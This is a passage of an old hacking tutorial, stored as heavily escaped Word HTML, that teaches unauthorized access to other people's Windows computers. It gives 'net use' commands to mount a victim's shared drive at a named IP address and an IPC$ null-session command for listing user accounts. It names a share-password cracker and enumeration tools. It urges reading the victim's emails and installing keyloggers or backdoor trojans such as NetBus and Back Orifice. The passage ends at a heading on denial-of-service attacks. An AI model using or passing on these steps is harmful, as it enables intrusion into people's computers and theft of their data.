Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Shared resources at \\203.195.136.156&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;ComputerNameGoesHere&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Share name Type Used as Comment&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;HP-6L Print&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;"Print " shows that the victim is sharing a printer named as HP-6L&lt;/span&gt;&lt;span style="font-size: 10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Lets do it.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;We will use the NET command to do our work .&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;net use k: \\203.195.136.156\CDISK&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;You may replace k letter by any other letter.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;If the command is successful we will get the confirmation - The command was completed successfullly&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;The command was completed successfully&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Now just double click on the My Computer icon on your desktop and you will be a happy hacker!&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Cracking Share passwords&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Windows 95&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Windows 98&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Windows Me&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;   &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Using IPC$ to hack Windows NT,2000,XP&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;We hackers use IPC$ in this way&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;net use k: \\123.123.123.123\ipc$ "" /user:""&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.&lt;/span&gt;&lt;span style="font-size: 10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.&lt;/span&gt;&lt;span style="font-size: 10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Penetrating in to the victim's computer&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;     &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Lets Hack - Part 2 Denial of service attack&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet 